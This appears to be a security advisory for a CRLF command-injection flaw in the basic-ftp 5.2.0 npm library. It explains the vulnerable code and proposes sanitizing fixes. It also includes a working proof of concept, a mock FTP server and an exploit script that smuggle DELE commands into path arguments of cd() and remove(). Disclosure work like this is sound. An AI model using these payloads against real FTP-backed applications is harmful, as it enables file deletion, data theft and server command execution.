Summary
basic-ftp version 5.2.0 allows FTP command injection via CRLF sequences
(\r\n) in file path parameters passed to high-level path APIs such as cd(),
remove(), rename(), uploadFrom(), downloadTo(), list(), and
removeDir(). The library's protectWhitespace() helper only handles leading
spaces and returns other paths unchanged, while FtpContext.send() writes the
resulting command string directly to the control socket with \r\n appended.
This lets attacker-controlled path strings split one intended FTP command into
multiple commands.
Affected product
| Product |
Affected versions |
Fixed version |
| basic-ftp (npm) |
5.2.0 (confirmed) |
no fix available as of 2026-04-04 |
Vulnerability details
- CWE:
CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
- CVSS 3.1:
8.6 (High)
- Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
- Affected component:
dist/Client.js, all path-handling methods via protectWhitespace() and send()
The vulnerability exists because of two interacting code patterns:
1. Inadequate path sanitization in protectWhitespace() (line 677):
async protectWhitespace(path) {
if (!path.startsWith(" ")) {
return path; // No sanitization of \r\n characters
}
const pwd = await this.pwd();
const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
return absolutePathPrefix + path;
}
This function only handles leading whitespace. It does not strip or reject \r (0x0D) or \n (0x0A) characters anywhere in the path string.
2. Direct socket write in send() (FtpContext.js line 177):
send(command) {
this._socket.write(command + "\r\n", this.encoding);
}
The send() method appends \r\n to the command and writes directly to the TCP socket. If the command string already contains \r\n sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.
Affected methods (all call protectWhitespace() → send()):
cd(path) → CWD ${path}
remove(path) → DELE ${path}
list(path) → LIST ${path}
downloadTo(localPath, remotePath) → RETR ${remotePath}
uploadFrom(localPath, remotePath) → STOR ${remotePath}
rename(srcPath, destPath) → RNFR ${srcPath} / RNTO ${destPath}
removeDir(path) → RMD ${path}
Technical impact
An attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:
- Arbitrary file deletion: Inject
DELE /critical-file to delete files on the FTP server
- Directory manipulation: Inject
MKD or RMD commands to create/remove directories
- File exfiltration: Inject
RETR commands to trigger downloads of unintended files
- Server command execution: On FTP servers supporting
SITE EXEC, inject system commands
- Session hijacking: Inject
USER/PASS commands to re-authenticate as a different user
- Service disruption: Inject
QUIT to terminate the FTP session unexpectedly
The attack is realistic in applications that accept user input for FTP file paths — for example, web applications that allow users to specify files to download from or upload to an FTP server.
Proof of concept
Prerequisites:
Mock FTP server (ftp-server-mock.js):
const net = require('net');
const server = net.createServer(conn => {
console.log('[+] Client connected');
conn.write('220 Mock FTP\r\n');
let buffer = '';
conn.on('data', data => {
buffer += data.toString();
const lines = buffer.split('\r\n');
buffer = lines.pop();
for (const line of lines) {
if (!line) continue;
console.log('[CMD] ' + JSON.stringify(line));
if (line.startsWith('USER')) conn.write('331 OK\r\n');
else if (line.startsWith('PASS')) conn.write('230 Logged in\r\n');
else if (line.startsWith('FEAT')) conn.write('211 End\r\n');
else if (line.startsWith('TYPE')) conn.write('200 OK\r\n');
else if (line.startsWith('PWD')) conn.write('257 "/"\r\n');
else if (line.startsWith('OPTS')) conn.write('200 OK\r\n');
else if (line.startsWith('STRU')) conn.write('200 OK\r\n');
else if (line.startsWith('CWD')) conn.write('250 OK\r\n');
else if (line.startsWith('DELE')) conn.write('250 Deleted\r\n');
else if (line.startsWith('QUIT')) { conn.write('221 Bye\r\n'); conn.end(); }
else conn.write('200 OK\r\n');
}
});
});
server.listen(2121, () => console.log('[*] Mock FTP on port 2121'));
Exploit (poc.js):
const ftp = require('basic-ftp');
async function exploit() {
const client = new ftp.Client();
client.ftp.verbose = true;
try {
await client.access({
host: '127.0.0.1',
port: 2121,
user: 'anonymous',
password: 'anonymous'
});
// Attack 1: Inject DELE command via cd()
// Intended: CWD harmless.txt
// Actual: CWD harmless.txt\r\nDELE /important-file.txt
const maliciousPath = "harmless.txt\r\nDELE /important-file.txt";
console.log('\n=== Attack 1: DELE injection via cd() ===');
try { await client.cd(maliciousPath); } catch(e) {}
// Attack 2: Double DELE via remove()
const maliciousPath2 = "decoy.txt\r\nDELE /secret-data.txt";
console.log('\n=== Attack 2: DELE injection via remove() ===');
try { await client.remove(maliciousPath2); } catch(e) {}
} finally {
client.close();
}
}
exploit();
Running the PoC:
# Terminal 1: Start mock FTP server
node ftp-server-mock.js
# Terminal 2: Run exploit
node poc.js
Expected output on mock server:
"OPTS UTF8 ON"
"USER anonymous"
"PASS anonymous"
"FEAT"
"TYPE I"
"STRU F"
"OPTS UTF8 ON"
"CWD harmless.txt"
"DELE /important-file.txt" <-- injected from cd()
"DELE decoy.txt"
"DELE /secret-data.txt" <-- injected from remove()
"QUIT"
This command trace was reproduced against the published [email protected]
package on Linux with a local mock FTP server. The injected DELE commands are
received as distinct FTP commands, confirming that CRLF inside path parameters
is not neutralized before socket write.
Mitigation
Immediate workaround: Sanitize all path inputs before passing them to basic-ftp:
function sanitizeFtpPath(path) {
if (/[\r\n]/.test(path)) {
throw new Error('Invalid FTP path: contains control characters');
}
return path;
}
// Usage
await client.cd(sanitizeFtpPath(userInput));
Recommended fix for basic-ftp: The protectWhitespace() function (or a new validation layer) should reject or strip \r and \n characters from all path inputs:
async protectWhitespace(path) {
// Reject CRLF injection attempts
if (/[\r\n\0]/.test(path)) {
throw new Error('Invalid path: contains control characters');
}
if (!path.startsWith(" ")) {
return path;
}
const pwd = await this.pwd();
const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
return absolutePathPrefix + path;
}
References
Summary
basic-ftpversion5.2.0allows FTP command injection via CRLF sequences(
\r\n) in file path parameters passed to high-level path APIs such ascd(),remove(),rename(),uploadFrom(),downloadTo(),list(), andremoveDir(). The library'sprotectWhitespace()helper only handles leadingspaces and returns other paths unchanged, while
FtpContext.send()writes theresulting command string directly to the control socket with
\r\nappended.This lets attacker-controlled path strings split one intended FTP command into
multiple commands.
Affected product
Vulnerability details
CWE-93- Improper Neutralization of CRLF Sequences ('CRLF Injection')8.6(High)CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:Ldist/Client.js, all path-handling methods viaprotectWhitespace()andsend()The vulnerability exists because of two interacting code patterns:
1. Inadequate path sanitization in
protectWhitespace()(line 677):This function only handles leading whitespace. It does not strip or reject
\r(0x0D) or\n(0x0A) characters anywhere in the path string.2. Direct socket write in
send()(FtpContext.js line 177):The
send()method appends\r\nto the command and writes directly to the TCP socket. If the command string already contains\r\nsequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.Affected methods (all call
protectWhitespace()→send()):cd(path)→CWD ${path}remove(path)→DELE ${path}list(path)→LIST ${path}downloadTo(localPath, remotePath)→RETR ${remotePath}uploadFrom(localPath, remotePath)→STOR ${remotePath}rename(srcPath, destPath)→RNFR ${srcPath}/RNTO ${destPath}removeDir(path)→RMD ${path}Technical impact
An attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:
DELE /critical-fileto delete files on the FTP serverMKDorRMDcommands to create/remove directoriesRETRcommands to trigger downloads of unintended filesSITE EXEC, inject system commandsUSER/PASScommands to re-authenticate as a different userQUITto terminate the FTP session unexpectedlyThe attack is realistic in applications that accept user input for FTP file paths — for example, web applications that allow users to specify files to download from or upload to an FTP server.
Proof of concept
Prerequisites:
Mock FTP server (ftp-server-mock.js):
Exploit (poc.js):
Running the PoC:
Expected output on mock server:
This command trace was reproduced against the published
[email protected]package on Linux with a local mock FTP server. The injected
DELEcommands arereceived as distinct FTP commands, confirming that CRLF inside path parameters
is not neutralized before socket write.
Mitigation
Immediate workaround: Sanitize all path inputs before passing them to basic-ftp:
Recommended fix for basic-ftp: The
protectWhitespace()function (or a new validation layer) should reject or strip\rand\ncharacters from all path inputs:References